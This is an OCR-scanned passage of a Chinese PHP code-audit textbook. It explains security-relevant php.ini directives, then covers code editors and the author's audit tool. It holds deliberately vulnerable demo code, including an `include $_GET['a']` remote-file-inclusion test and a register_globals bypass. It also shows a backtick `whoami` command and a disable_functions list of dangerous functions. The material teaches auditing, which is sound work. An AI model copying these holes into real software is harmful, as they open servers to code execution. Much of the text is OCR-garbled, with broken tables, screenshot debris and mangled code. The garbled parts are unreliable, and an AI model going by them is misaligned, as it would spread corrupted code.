我 们 在 阅读 PHP 官 方 配 置 说 明 (http://www.php.net/manual/zh/ini.list.php) 之 前 需要 了 解 几 个 定义 值 ， 即 PHP_INI_* 常 量 的 定义 ， 参 见 表 1-1。 


表 1-1 PHP_INI_* 常 量 的 定义 


第 — 058 $ X 


PHP INI USER 该 配置 选项 可 在 用 户 的 PHP 脚本 或 Windows 注册 表 中 设置 
PHP INI PERDIR 该 配置 选项 可 在 php.ini. .htaccess 2X httpd.conf 中 设置 

PHP INI SYSTEM 该 配置 选项 可 在 php.ini 或 httpd.conf 中 设置 

PHP INI ALL 该 配置 选项 可 在 任何 地 方 设置 

php.ini only 该 配置 选项 可 仅 可 在 php.ini 中 配置 


PHP 配 置 文件 指令 多 达 数 百 项 ， 为 了 节省 篇 幅 ， 这 里 不 一 一 对 每 个 指令 进行 说 明 ， 只 列 出 会 影响 PHP 脚 本 安全 的 配置 列表 以 及 核心 配置 选项 。 


1.register globals (全 局 变量 注册 开关 ) 


该 选项 在 设置 为 on 的 情况 下 ， 会 直接 把 用 户 GET、POST 等 方式 提交 上 来 的 参数 注册 成 全 局 变量 并 初始 化 值 为 参数 对 应 的 值 ， 使 得 提交 参数 可 以 直接 在 脚本 中 使 用 。register globals 在 PHP 版 本 小 于 等 
于 4.2.3 时 设置 为 PHP_INI ALL， 从 PHP 5.3.0 起 被 废弃 ， 不 推荐 使 用 ， 在 PHP 5.4.0 中 移 除了 该 选项 。 


当 register globals 设 置 为 on 且 PHP 版 本 低 于 5.4.0 时 ， 如 下 代码 输出 结果 为 true。 


测试 代码 : 





«? php 

if ($user--'admin') 1 
echo 'true'; 

//do something 

} 








执行 结果 如 图 1-6 所 示 。 





火狐 官方 站 点 LO 新 手 上 路 |) 常用 网 址 园 Se 


T " ho true E w http://localhost/phpsafe/1.php?user=admin 
//do something 


Split URL 
Execute 
Enable Post data Enable Referrer 





2.allow url include (是 否 人 允许 包含 远程 文件 ) 


这 个 配置 指令 对 PHP 安 全 的 影响 不 可 小 凯 。 在 该 配置 为 on 的 情况 下 ， 它 可 以 直接 包含 远程 文件 ， 当 存在 include ($var) 且 $var 可 控 的 情况 下 ， 可 以 直接 控制 $var 变 量 来 执行 PHP 代 码 。 
allow_url_include 在 PHP 5.2.0 后 默认 设置 为 off， 配 置 范围 是 PHP_INI_ALL。 与 之 类 似 的 配置 有 allow_url fopen， 配 置 是 否 允 许 打 开 远 程 文件 ， 不 过 该 参数 对 安全 的 影响 没有 allow_url_ include 大 ， 故 这 里 


不 详细 介绍 。 


配置 allow_url_include 为 on， 可 以 直接 包含 远程 文件 。 测 试 代码 如 下 : 


<? php 
include $ GET['a']; 








测试 截图 如 图 1-7 所 示 。 

3.magic quotes gpc (魔术 引号 自动 过 滤 ) 

magic quotes gpc 在 安全 方面 做 了 很 大 的 贡献 ， 只 要 它 被 开启 ， 在 不 存在 编码 或 者 其 他 特殊 绕 过 的 情况 下 ， 可 以 使 得 很 多 漏洞 无 法 被 利用 ， 它 也 是 让 渗透 测试 人 员 很 头疼 的 一 个 东西 。 当 该 选项 设置 
为 on 时 ， 会 自动 在 GET、POST、COOKIE 变 量 中 的 单 引 号 () 、 双 引号 (C) 、 反 斜 杠 (\) 及 空 字符 (NULL) 的 前 面 加 上 反 和 斜 杠 (X) ， 但 是 在 PHP 5 中 magic_quotes_gpc 并 不 会 过 滤 $ SERVER 变量 ， 
导致 很 多 类 似 client-ip、referer 一 类 的 漏洞 能 够 利用 。 在 PHP 5.3 之 后 的 不 推荐 使 用 magic_ quotes gpc, PHP 5.4 之 后 干脆 被 取消 ， 所 以 你 下 载 PHP 5.4 之 后 的 版 本 并 打开 配置 文件 会 发 现 找 不 到 这 个 配置 
选项 。 在 PHP 版 本 小 于 4.2.3 时 ， 配 置 范围 是 PHP_INI ALL; 在 PHP 版 本 大 于 4.2.3 时 ， 是 PHP_ INI_ PERDIR, 


LS 一 一 一 二 = 
| N € | localhost/phpsafe/1.php?a-hti V Eg v c | El - Google «co P | E 
Sm V ER 


访问 最 多 |) 火狐 官方 站 点 三] 新 手 上 路 | 常用 网 址 E) 35x ( SESE) 
| = @ SQL- XSS- Encryption Encoding- Other- 
Load URL — http;//localhost/phpsafe/1.php?a- http://localhost/test/2.txt 
Split URL 
Execute 
Enable Post data Enable Referrer 





测试 代码 如 下 : 


«? php 
echo $ GET['seay']; 








测试 结果 如 图 1-8 所 示 。 


Load URL — httpz/localhost/phpsate/1.php?seay-1' 
Split URL 


Execute 


[^] Enable Post data Enable Referrer 





4.magic quotes runtime (魔术 引号 自动 过 滤 ) 


magic_ quotes_runtime 也 是 自动 在 单 引号 () 、 双 引号 C) 、 反 和 斜 杠 (\) REFF (NULL) 的 前 面 加 上 上 反 斜 杠 (\) 。 它 跟 magic_ quotes gpc 的 区 别 是 ， 处 理 的 对 象 不 一 
样 ，magic_quotes_runtime 只 对 从 数据 库 或 者 文件 中 获取 的 数据 进行 过 滤 ， 它 的 作用 也 非常 大 ， 因 为 很 多 程序 员 只 对 外 部 输入 的 数据 进行 过 滤 ， 却 没有 想 过 从 数据 库 获 取 的 数据 同样 也 会 有 特殊 字符 存 
在 ， 所 以 攻击 者 的 做 法 是 先 将 攻击 代码 写 入 数据 库 ， 在 程序 读 取 、 使 用 到 被 污染 的 数据 后 即 可 触发 攻击 。 同 样 ，magic_quotes_runtime 在 PHP 5.4 之 后 也 被 取消 ， 配 置 范 围 是 PHP_INI_ALL。 


有 一 个 点 要 记 住 ， 只 有 部 分 函数 受 它 的 影响 ， 所 以 在 某 些 情 况 下 这 个 配置 是 可 以 绕 过 的 ， 受 影响 的 列表 包括 get meta tags () . file get contents () 、file () 、fgets () 、fwrite () 、 
fread () 、fputcsv () , stream socket recvfrom () 、exec () 、system () , passthru () 、stream get contents () 、bzread () 、gzfile () 、gzgets () 、gzwrite () 、gzread () 、 
exif read data () . dba insert () , dba replace () , dba fetch () , ibase fetch row () , ibase fetch assoc () , ibase fetch object () . mssql fetch row () , 
mssql fetch object () . mssql fetch array () 、mssql fetch assoc () . mysqli fetch row () 、mysqli fetch array () , mysqli fetch assoc () 、mysqli fetch object () 、 
pg fetch row () . pg fetch assoc () . pg fetch array () 、 pg fetch object () . pg fetch all () 、 pg select () . sybase fetch object () , sybase fetch array () 、 
sybase fetch assoc () . SplFileObject: : fgets () . SplFileObject: : fgetcsv () . SplFileObject: : fwrite () 。 


测试 代码 如 下 : 





# 文 件 1 .七 xt 

1'2"3\4 

# 文 件 1 .php 

<? php 

ini set ("magic quotes runtime", "1") ; 
echo file get contents ("l.txt") ; 








测试 结果 如 图 1-9 所 示 。 
5.magic quotes sybase (魔术 引号 自动 过 滤 ) 


magic quotes _ sybase 指令 用 于 自动 过 滤 特殊 字符 ， 当 设置 为 on 时 ， 它 会 履 盖 掉 magic_dquotes gpc=on 的 配置 ， 也 就 是 说 ， 即 使 配置 了 gpc=on 也 是 没有 效果 的 。 这 个 指令 与 gpc 的 共同 点 是 处 理 的 对 


象 一 致 ， 即 都 对 GET、POST、Cookie 进 行 处 理 。 而 它们 之 前 的 区 别 在 于 处 理 方式 不 一 样 ，magic_quotes sybase 仅仅 是 转 义 了 空 字符 和 把 单 引 号 U) 变 成 了 双 引 号 (C) 。 与 gpc 相 比 ， 这 个 指令 使 用 得 更 
少 ， 它 的 配置 范围 是 PHP_INI_ALL， 在 PHP 5.4.0 中 移 除了 该 选项 。 


a * gti al € | localhost/phpsafe/1.php?seay-1' 


ns 


L tx 全 | WB saes D ems O 新 皇上 路 D emt D 
1 


= $ SQL- XSS- Encryption? Encoding” 














Load URL 


Split URL 


+) Execute 
ost data Enable Referrer 





测试 代码 如 下 : 





«? php 
echo $ GET['a']s ? > 








执行 结果 如 图 1-10 所 示 。 


|B 访问 最 多 [火狐 官方 站 点 (OD 新 手 上 路 O 常用 网 址 园 see 


] <?php | OPAL Ua | 
echo $ GET| a |;-]| = $ SQL XSS- Encryption- | Encoding-| Othe 


而 LoadURL = http://localhost/phpsafe/1.php?a=1'2"3\4%005 


| Split URL 


+) Execute 
Enable Post data Enable Referrer 


1 2°3\4\05 





图 1-10 


6.safe mode (安全 模式 ) 

安全 模式 是 PHP 内 巷 的 一 种 安全 机 制 ， 当 safe_ mode=on 时 ， 联 动 可 以 配置 的 指令 有 safe_ mode include dir, safe mode exec dir. safe mode allowed env vars, 
safe mode protected env vars, safe mode 指 令 的 配置 范围 为 PHP_ INI SYSTEM, PHP 5.4 之 后 被 取消 。 

这 个 配置 会 出 现下 面 限 制 : 

1) 所 有 文件 操作 函数 (例如 unlink () 、file () 和 include () ) 等 都 会 受到 限制 。 例 如 ， 文 件 a.php 和 文件 c.txt 的 文件 所 有 者 是 用 户 a， 文 件 b.txt 的 所 有 者 是 用 户 b 并 且 与 文件 a.php 不 在 属于 同一 个 
用 户 的 文件 夹 中 ， 当 启用 了 安全 模式 时 ， 使 用 a 用 户 执行 a.php， 删 除 文件 c.txt 可 成 功 删除 ， 但 是 删除 文件 b.php 会 失败 。 对 文件 操作 的 include 等 函数 也 一 样 ， 如 果 有 一 些 脚本 文件 放 在 非 Web 服 务 启动 用 户 
所 有 的 目录 下 ， 需 要 利用 include 等 国 数 来 加 载 一 些 类 或 函数 ， 可 以 使 用 safe mode include dir 指令 来 配置 可 以 包含 的 路 径 。 

2) 通过 函数 popen () 、system () 以 及 exec () 等 函数 执行 命令 或 程序 会 提示 错误 。 如 果 我 们 需要 使 用 一 些 外 部 脚本 ， 可 以 把 它们 集中 放 在 一 个 目录 下 ， 然 后 使 用 safe_ mode exec _ dir 指令 指向 脚 
本 的 目录 。 

下 面 是 启用 safe_mode 指 令 时 受 影 响 的 孙 数 、 变 量 及 配置 指令 的 完整 列表 : 

apache request headers () 、ackticks () 、hdir () 、hgrp () 、chmode () 、chown () 、copy () 、dbase open () 、dbmopen () .dl () 、exec () 、filepro () 、 
filepro retrieve () 、ilepro rowcount () 、fopen () 、header () 、highlight file () 、ifx *、ingres *、link () 、mail () , max execution time () , mkdir () 、 
move uploaded file () , mysql *. parse ini file () , passthru () . pg lo import () , popen () . posix mkfifo () , putenv () 、 rename () ~、 zmdir () , set time limit () 、 


shell exec () , show source () , symlink () , system () , touch () à. 


安全 模式 下 执行 命令 失败 的 提示 ， 如 图 1-11 所 示 。 














a| Else £3 t. phil j Load URL http://localhost/phpsafe/1.php 
<?php 1|% split URL 


Execute 


echo ^ whoami > Enable Post data Enable Referrer 


Warning: shell exec() [function. shell-exec]: Cannot execute using backquotes in Safe Mode in 





7.open basedir PHP 可 访问 目录 


open_basedir 指 令 用 来 限制 PHP 只 能 访问 哪些 目录 ， 通 常 我 们 只 需要 设置 Web 文 件 目 录 即 可 ， 如 果 需 要 加 载 外 部 脚本 ， 也 需要 把 脚本 所 在 目录 路 径 加 入 到 open_basedir 指 令 中 ， 多 个 目录 以 分 号 
(; ) 分 割 。 使 用 open_basedir 需 要 注意 的 一 点 是 ， 指 定 的 限制 实际 上 是 前 级 ， 而 不 是 目录 名 。 例 如 ， 如 果 配 置 open_basedir=/www/a， 那 么 目录 /www/a 和 /www/ab 都 是 可 以 访问 的 。 所 以 如 果 要 将 访 


问 仅 限 制 在 指定 的 目录 内 ， 请 用 斜 线 结束 路 径 名 。 例 如 设置 成 : open_basedir=/www/a/。 


当 open_basedir 配 置 目录 后 ,执行 脚本 访问 其 他 文件 都 需要 验证 文件 路 径 ， 因 此 在 执行 效率 上 面 也 会 有 一 定 的 影响 。 该 指令 的 配置 范围 在 PHP 版 本 小 于 5.2.3 时 是 PHP_INI_SYSTEM， 在 PHP 版 本 大 于 


等 于 5.2.3 是 PHP_INI ALL, 


8.disable functions (禁用 函数 ) 


在 正式 的 生产 环境 中 ， 为 了 更 安全 地 运行 PHP， 也 可 以 使 用 disable_functions 指 令 来 茶 止 一 些 敏 感 函 数 的 使 用 。 当 你 想 用 本 指令 茶 止 一 些 危险 函数 时 ， 切 记 要 把 dl () 函数 也 加 到 禁止 列表 ， 因 为 攻击 


者 可 以 利用 dl () 函数 来 加 载 自 定义 的 PHP 扩 展 以 突破 disable functions 指 令 的 限制 。 
本 指令 配置 范围 为 php.ini only。 配 置 禁 用 函数 时 使 用 逗号 分 割 函 数 名 ， 例 如 : disable functions=phpinfo, eval, passthru, exec, system, 


9.display_errors 和 error_ reporting 错 误 显 示 


display_errors 表 明 是 否 显示 PHP 脚 本 内 部 错误 的 选项 ， 在 调试 PHP 的 时 人 息 ， 通 常 都 把 PHP 错 误 显示 打开 ， 但 是 在 生产 环境 中 ， 建 议 关 闭 PHP 错 误 回 显 ， 即 设置 display_errors=off， 以 避免 带 来 一 些 安 
全 隐患 。 在 设置 display_errors=on 时 ， 还 可 以 配置 的 一 个 指令 是 error_reporting， 这 个 选项 用 来 配置 错误 显示 的 级 别 ， 可 使 用 数字 也 可 使 用 内 置 常量 配置 ， 数 字 格 式 与 常量 格式 的 详细 信息 如 表 1-2 所 示 。 


表 1-2 ”数字 格式 与 常量 格式 


B Em X 


l E ERROR 128 E COMPILE WARNING 


bJ 


E WARNING 256 E USER ERROR 


4 E PARSE 512 E USER WARNING 
8 E NOTICE 1024 E USER NOTICE 


16 E CORE ERROR 2047 E ALL 


64 E COMPILE ERROR 





这 两 个 指令 的 配置 范围 都 是 PHP_INI_ALL。 


会 影响 到 安全 的 指令 大 致 就 介绍 到 这 里 ， 表 1-3 列 出 一 些 常用 指令 以 及 对 应 的 说 明 。 


表 1-3 常用 指令 及 说 明 


H € RI BE Er 3c FB] 说 明 


以 安全 模式 打开 文件 时 默认 使 用 UID 来 比 对 ; 设置 本 指令 


safe mode gid PHP INI SYSTEM bn nicum 
一 ~~ =Z 一 为 on 时 使 用 GID 做 宽松 的 比 对 





expose php php.ini only 是 否 在 服务 器 返回 信息 HTTP ER PHP 版 本 


max execution time PHP INI ALL fk BEA E e HUE BP 
memory limit PHP INI ALL ET BALA BE nie fo H3 EN EGE 





log errors PHP INI ALL 将 错误 输入 到 日 志文 件 
log errors max len PHP INI ALL WE log errors 的 最 大 长 度 


此 指令 摘 述 了 PHP 注册 GET, POST, Cookie, HAAN E 


FERAE, 注册 使 用 从 左 往 右 的 顺 友 . BERI ee 78 IH RIAL. 


post max size PHP INI PERDIR PHP 可 以 接受 的 最 大 的 POST 数据 大 小 
auto prepend file PHP INI PERDIR 在 任何 PHP 文档 之 前 目 动 包含 的 文件 
auto append file PHP INI PERDIR 在 任何 PHP 文档 之 后 目 动 包含 的 文件 


extension dir PHP INI SYSTEM 可 加 载 的 扩展 (模块 ) 的 目录 位 置 


variables order PHP INI PERDIR 





file uploads PHP INI SYSTEM 是 否 人 允许 HTTP 文件 上 传 


upload tmp dir PHP INI SYSTEM MF HTTP 上 传 文 件 的 临时 文件 目录 
upload max filesize PHP INI SYSTEM 允许 上 人 忧 的 最 大 文件 大 小 





第 2 草 ”审计 辅助 与 漏洞 验证 工具 


在 代码 审计 和 开发 中 ， 我 们 都 需要 一 些 代 码 编辑 器 来 编辑 代码 ， 或 者 调试 代码 ， 也 需要 一 些 工具 来 验证 漏洞 是 否 存在 。 而 各 个 编辑 器 也 有 所 差异 ， 所 谓 宝刀 配 贡 雁 ， 使 用 一 款 好 的 编辑 器 能 帮助 你 所 向 
披 靡 ， 更 简单 轻松 地 写 代码 。 而 对 于 审计 师 来 说 ; 代码 审计 软件 也 是 如 此 ， 一 款 好 的 代码 审计 工具 可 以 使 审计 师 在 短 时 间 内 快速 砾 现 代码 问题 。 本 章 将 详细 介绍 几 款 常用 的 代码 编辑 器 和 代码 审计 软件 以 及 
一 些 常 用 的 漏洞 验证 辅助 工具 。 


2.1 代码 编辑 器 


不 管 是 做 开发 还 是 代码 审计 ， 一 款 顺 手 的 代码 编辑 器 必 不 可 少 ， 代 码 编辑 器 从 轻 量 级 到 功能 复杂 强大 的 完备 型 ， 从 免费 到 商业 ， 都 有 很 多 款 供 我 们 选择 ， 我 们 可 以 根据 需要 选择 最 适合 的 一 款 ， 常 用 的 
轻 量 级 代码 编辑 器 有 Nodepad++、Editplus、UltraEdit、PSPad、Vim、Gedit， 等 等 ， 这 些 都 是 都 是 通用 型 文本 编辑 器 ， 支 持 多 种 编程 语言 代码 高 亮 ， 优 点 是 操作 简单 ， 启 动 快 并 且 对 文本 操作 很 方便 。 
常用 的 完备 型 PHP 开 发 软件 也 不 少 ， 这 类 编辑 器 主要 的 优点 是 功能 全 ， 对 代码 调试 、 代 码 提 示 等 都 支持 得 比较 好 ， 使 我 们 在 开发 的 时 候 bug 更 少 ， 开 发 效率 更 高 ， 常 用 的 有 Zend Studio, PhpStorm, 
PhpDesigner 以 及 NetBeans 等 。 


如 果 你 用 编辑 器 来 做 开发 ， 并 且 代 码 量 比较 大 ， 建 议 你 使 用 Zend Studio。 如 果 用 来 做 代码 审计 或 者 少量 代码 的 开发 ， 建 议 使 用 Nodepad++ 这 类 轻 量 级 文本 编辑 器 。 
2.1.1 Notepad++ 


Notepad+ + 是 一 套 非常 有 特色 的 开源 纯 文 字 编辑 器 (许可 证 : GPL) ， 运 行 于 Windows 系 统 ， 有 完整 的 中 文 接口 及 支持 多 国语 言 撰写 的 功能 (UTF8 技 术 ) 。 它 的 功能 比 Windows 中 的 Notepad (id 
BA) 强大 ， 除 了 可 以 用 来 编辑 一 般 的 纯 文字 文件 之 外 ， 也 十 分 适合 轻 量 开发 的 编辑 器 。Notepad+ + 不 仅 有 语法 高 亮 显示 功能 ， 也 有 语法 折 功 功能 ， 并 且 支 持 宏 以 及 扩充 基本 功能 的 外 挂 模 组 。 


Notepad++ 可 以 安装 免费 使 用 。 支 持 如 下 语言 的 代码 高 亮 显 示 : C、C++、Java、C#、XML、HTML、PHP、ASP、Autolt、DOS 批 处 理 、CSS、ActionScript、Fortran、Gui4Cli、Haskell、JSP、 
Lisp、Lua、Matlab、NSIS、Objective-C、Pascal、Python、JavaScript 等 。 


Notepad+ + 拥有 非常 多 强大 的 功能 ， 特 别 是 对 文本 操作 非常 灵活 ， 这 是 笔者 用 得 最 多 的 一 个 文本 编辑 器 ， 经 常用 来 做 一 些 有 特定 格式 的 文本 批量 蔡 换 、 搜 索 、 去 重 ， 等 等 。 当 然 ， 它 的 强大 不 止 如 
此 。 下 面 简单 介绍 下 它 的 核心 功能 : 


1) 内 置 支持 多 达 27 种 语法 高 亮 显 示 (包括 各 种 常见 的 源 代 码 、 脚 本 ， 能 够 很 好 地 支持 .nfo 文 件 查看 ) ， 还 支持 自 定 义 语言 。 


C 


ü 


2) 可 自动 检测 文件 类 型 ， 根 据 关键 字 显示 节点 ， 节 点 可 自由 折 赤 /展开 ， 还 可 显示 缩 进 引 导线 ， 代 码 显 示 得 很 有 层次 感 。 
3) 可 打开 双 窗口 ， 在 分 窗口 中 又 可 打开 多 个 子 窗口 ， 显 示 比 例 。 
4) 提供 了 一 些 有 用 工具 ， 如 邻 行 互 换 位 置 、 宏 功能 等 。 


5) 可 显示 选中 的 文本 的 字 节 数 (而 不 是 一 般 编辑 器 所 显示 的 字数 ， 这 在 某 些 情况 下 很 方便 ， 比 如 软件 本 地 化 ) 。 


6) 正则 匹配 字符 串 及 批量 替换 ， 也 支持 批量 文件 操作 。 
T) 强大 的 插件 机 制 ， 扩 展 了 编辑 能 力 ， 如 Zen Coding, 


我 们 可 以 在 官网 Notepad+ + 官网 (notepad-plus-plus.org) 下 载 最 新 版 。 主 界面 如 图 2-1 所 示 。 


2.1.2 UltraEdit 


UltraEdit (官网 www.ultraedit.com) 是 一 款 功 能 强大 的 文本 编辑 器 ， 不 过 它 不 是 开源 软件 ， 官 网 售 价 79.95 美 元 ， 可 以 完美 运行 在 Windows、Linux 以 及 Mac 系 统 上 。 


这 款 编辑 器 不 仪 可 以 编辑 文本 ， 还 支持 十 六 进 制 查看 以 及 编辑 。 可 以 直接 在 上 面 修改 exe 等 文件 ， 如 图 2-2 所 示 。 














I; $1 <= Scount; $144 ) 


Smessage = Spop3->get ($i); 


Sbodysignal = false; 


sboundary = ''; 
Scharset 
Scontent 








; AHA SFE) SERO) 插入 (N) .LfE(P) 


navicat.exe x 


O12b5100h: 
012b65110h: 
ü12b5120h: 
ü12b5130h: 
012b5140h: 
012b5150h: 
012b5160h: 
D12b51TÜh: 
012b5180h: 
012b5190h: 
(012551 ah: 
012b51b0h: 
O12b51c0h: f 
(12551 dh: 
O12bs1 eh: 
012651 £0h: 
ü12b5200h: 
012b5210h: 
012b5220h: 
012b5230h: 
ü12b5240h: 
012b5250h: 
012b5260h: 
D12b52TÜh: 
ü12b5290h: 
012b5290h: 
(12552 ah: 


该 编辑 器 支持 将 近 二 十 种 编程 语言 的 语法 
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3 示 ， 可 同时 编辑 多 个 文件 ， 支 持 打 开 超 过 4GB 以 上 的 文件 ， 支 持 多 种 编码 转换 、 排 序 去 重 。 
就 可 以 在 使 用 UltraEdit 编 辑 PHP 代 码 的 时 候 直接 执行 代码 。 再 结合 它 的 代码 补 全 功能 ， 它 也 算得 上 一 款 不 错 的 代码 编辑 器 。 要 实现 这 个 
在 “命令 行 ” 的 位 置 填 入 你 的 PHP 文 件 路 径 ， 在 “菜单 项 目 名 称 ” 上 写 你 想 填 的 菜单 栏 名 称 ， 这 里 写 的 是 php.exe， 在 “工作 目录 ”中 写 上 你 的 PHP exe 路 径 ， 然 后 点 击 “ 确 定 ”按钮 ， 即 可 新 建 一 个 文 
件 。 在 “高 级 ”菜单 里 面 点 一 下 添加 的 php.exe (菜单 栏 名 称 ) 即 可 执行 代码 ， 如 图 2-3 所 示 。 


THRE, 


首先 在 


通过 配置 使 用 的 脚本 运行 程序 路 径 
“高 级 一 工具 栏 配置 ”中 配置 一 些 执行 环境 参数 ， 
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， 比 如 php.exe 的 路 径 ， 


CAUsersMAdministratorDesktopVE php] - Ul " 





<?php 


D: 5phpztudy*php52*php. exe SF 

IFAR: 

D: *5phpstudy'*php52*^ext 

IE RAE RE): 

D: \phps tudy'*php52 \php. exe 
PHP Version => 5.2.17 





System => Windows NT PC201405191845 6. 1 build 
Build Date => Jan 6 2011 17:26:08 
Configure Command => cscript /nologo configure. js 
Server API => Command Line Interface 
Virtual Directory Support => enabled 
Configuration File (php.ini) Path => C:\Windows 
Loaded Configuration File => D:\phpstudy\php52\phpi 
| Scan this dir for additional .ini fles => (none) 
| additional .ini files parsed => (none) 
PHP API => 20041225 
PHP Extension => 20060613 





另外 一 个 比较 好 的 功能 是 文件 对 比 。 这 个 功能 也 是 经 常会 用 到 的 ， 特 别 是 我 们 在 分 析 开 源 程 序 发 布 的 官方 补丁 时 ， 比 如 Phpcms 某 天 发 布 了 一 个 代码 执行 漏洞 修补 补丁 ， 那 么 我 们 就 可 以 在 官网 下 载 补 
丁 文件 ， 然 后 利用 UltraEdit 的 文件 对 比 功能 来 快速 找到 修改 了 哪 段 代码 ， 修 改 的 部 分 是 不 是 成 功 修补 了 这 个 漏 词 ， 或 者 未 公开 的 漏洞 。 也 可 以 根据 这 个 方法 快速 找到 漏洞 在 哪里 。 


这 个 功能 可 以 在 菜单 栏 “ 文 件 一 比较 文件 ”中 找到 ， 然 后 选择 要 对 比 的 两 个 以 上 文件 ， 勾 选 “比较 选项 ”里 面 以 忽略 开头 的 所 有 选项 ， 点 击 “ 比 较 ” 按 钮 即 可 ， 如 图 2-4 所 示 。 
如 果 比 较 的 文件 有 不 同 的 地 方 ， 它 会 用 红色 标 出 ， 如 图 2-5 所 示 。 


UltraEdit 被 公认 为 程序 员 必 备 的 编辑 器 ， 是 能 够 满足 你 一 切 编辑 需要 的 编辑 器 。 
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比较 的 第 1 个 文件 OF): 

E: ippa code. php - > 
比较 的 第 2 个 文件 G): 

E: ipp aR codesl. php - lum 
比较 的 第 3 个 文件 = 
| | [^^] 
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提示 :你 正 使 用 UtraConpare Proe 司 以 进行 完整 的 文件 /文件 夫 / 合 并 /比较 扣 
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«?php «?php 


echa "1": echo "1"; 


* echo "2"; ] | echo "safekey";] : 红色 








echo "3"; ; echo “3”; 
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phpinfo () =; phpinfo(); 


e be 
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2> 25 





2.1.3 Zend Studio 


Zend studio 与 PHP 出 自 同一 家 公司 ， 也 可 以 说 Zend studio 是 PHP 官 方 专门 开发 出 来 用 来 编写 PHP 代 码 的 代码 编辑 器 。Zend Studio 是 目前 用 户 量 最 大 的 PHP 开 发 工具 ， 也 是 屡 获 大 奖 的 专业 PHP 集 成 
开发 环境 ， 具 备 功 能 强大 的 专业 编辑 工具 和 调试 工具 ， 支 持 PHP 语 法 高 亮 显示 ， 支 持 语法 自动 填充 功能 ， 支 持 书签 功能 ， 支 持 语法 自动 缩 排 和 代码 复制 功能 ， 内 置 一 个 强大 的 PHP 代 码 调试 工具 ， 支 持 本 地 
和 远程 两 种 调试 模式 ， 支 持 多 种 高 级 调试 功能 ， 可 以 完美 运行 在 目前 主流 的 Windows、Linux 以 及 Mac 操 作 系统 上 。 官 网 是 http://www.zend.com/en/products/studio。 


Zend Studio 10.6 版 本 的 界面 截图 如 图 2-6 所 示 。 


a. met e Zend Studio - DAwam WW 


4 È phpsafe 
> [E] Lphp 
b mà PHP Include Path 
b mà PHP Language Library 


4 
| 





图 2-6 


Zend Studio 最 令 笔者 最 喜欢 的 功能 是 代码 提示 功能 ， 实 际 上 ， 只 要 这 个 功能 做 得 好 的 编辑 器 ， 笔 者 都 非常 喜欢 ， 因 为 这 非常 人 性 化 ， 可 以 让 我 们 不 用 去 记 那 么 多 函数 ， 等 你 经 常用 的 编程 语言 超过 了 6 
种 以 上 ， 你 就 会 深 有 感触 。 代 码 提示 功能 如 图 2-7 所 示 。 


BUS) Search RAP) AR) SOW SER) Zend Store 


© file exists(Shlename) - standard.php |. file get contents(Sfilename, Suse include path, $context, | 
| $offset, $maxlen) | 

e file get contents($filename, $use include -path, $context, Soff | 

|6 file put contents(Sfilename, $data, $flags, $context) - standai Reads entire file into a string 


4 FILE APPEND 
4 HLE BINARY filename string 
Æ HLE IGNORE NEW LINES | 
4 FILE NO DEFAULT. CONTEXT 
4 FILE SKIP EMPTY LINES use include path bool[optional] 
Æ HLE TEXT 
4 FILE USE INCLUDE PATH trigger include path search. 


Name of the file to read. 





As of PHP 5 the FILE USE INCLUDE PATH can be used to 


——— | context resourceloptional 
ig "Alt«/" LASER 模板 建 议 | 在 建议 表 中 按 "lab" RR, 或 单 击 以 著 取 焦点 





图 2-7 


另外 Zend Studio 在 代码 调试 方面 也 非常 强大 ， 支 持 多 种 调试 模式 ， 利 用 它 的 调试 功能 ， 可 以 让 我 们 非常 快 地 发 现 bug 位 置 ， 监 控 数 据 传递 过 程 和 函数 运行 情况 ， 如 图 2-8 所 示 。 


SHER) REE SAD BOSC) MEN) Search MAP ER EOW) SMH) Zend Store 


= 图 克昌 :*-0-9S-18:4-.4:w|wum:|xoo.t-zb: m. a ET S ast |y PHP 


:由 


te iat 
4 fil index (1) [php H] 
4 5E pHp 应 用 程 太 
af index.php (suspended) P9 &GET 
= jphpsafe/index.php at line 5 + $ POST 
BS FAProgram Files (x86)\Zend\Zend Studio 10.6.0\plugins\comzend.pl $9 $ COOKIE 


$9 $_FILES 


use ctatements 


echo 1; 
echo 2; 
phpinfo(); 
echo 4; 
echo 5; 
4 
G pya [£5] S| 3. Debug Output 92. F Browser Output 
X-Powered-By: PHP/5.5.7 | 
Set-Cookie: ZendDebuggerCockiez127.0.0.1262410137963A0 |084| 77 /42D65| 1018; path=/ 
Content-type: text/html 





22 ”代码 审计 工具 


代码 审计 工具 是 一 类 辅助 我 们 做 白 盒 测 试 的 程序 ， 它 可 以 分 很 多 类 ， 例 如 安全 性 审计 以 及 代码 规范 性 审计 ， 等 等 。 当 然 ， 也 可 以 按 它 能 审计 的 编程 语言 分 类 ， 目 前 商业 性 的 审计 软件 大 多 支持 多 种 编程 
语言 ， 也 有 个 人 或 团队 开发 的 免费 开源 审计 软件 ， 像 笔者 的 “Seay 源 代码 审计 系统 ”就 是 开源 程序 。 使 用 一 款 好 的 代码 审计 软件 可 以 极 大 地 降低 审计 成 本 ， 可 以 帮助 审计 师 快 速 发 现 问题 所 在 ， 同 时 也 能 降 
低 审 计 门槛 ， 但 也 不 能 过 分 依赖 审计 软件 。 目 前 常用 的 代码 安全 审计 软件 还 有 Fortify SCA、RIPS、FindBugs、Codescan 等 。 下 面 介绍 几 款 常用 代码 安全 审计 工具 。 


2.2.1 Seay 源 代码 审计 系统 


这 是 笔者 基于 C# 语 言 开发 的 一 款 针对 PHP 代 码 安全 性 审计 的 系统 ， 主 要 运行 于 Windows 系 统 上 。 这 款 软件 能 够 友 现 SQL 注 入 、 代 码 执 行 、 命 令 执 行 、 文 件 包 含 、 文 件 上 传 、 绕 过 转 义 防护 、 拒 绝 服务 、 
XSs 跨 站 、 信 息 泄 露 、 任 意 URL 跳 转 等 漏洞 ， 基 本 上 覆盖 常见 PHP 漏 洞 。 另 外 ， 在 功能 上 ， 它 支持 一 键 审 计 、 代 码 调试 、 函 数 定位 、 插 件 扩展 、 自 定义 规则 配置 、 代 码 高 亮 、 编 码 调试 转换 、 数 据 库 执 行 监控 
等 数 十 项 强大 功能 。 主 界面 如 图 2-9 所 示 。 


** Beay URTE --www.cnzeay.com p i 
i AAEE X 关闭 项 目 A AMR PARRE D 市 计 揪 件 2 ABAH Se iL 数据 管理 iiuen 图 临时 记录 Z5 Enne - i 关于 3 
Lada SS 。 编码 : Trae iB: gr: 

[ini 


一 键 审计 代码 调试 函数 定位 择 件 扩展 规则 配置 


(MSs 审计 报告 AKAA 正则 调试 编 公 转换 
数据 提交 临时 记录 文件 编辑 英汉 互 译 黑 盒 审计 
全 局 搜索 在 线 升级 编辑 器 配置 数据 库 管理 和 监控 


目 网 www. cnseay.com SafeKey HIBA H ih 





zie: ¥2.0 








图 29 
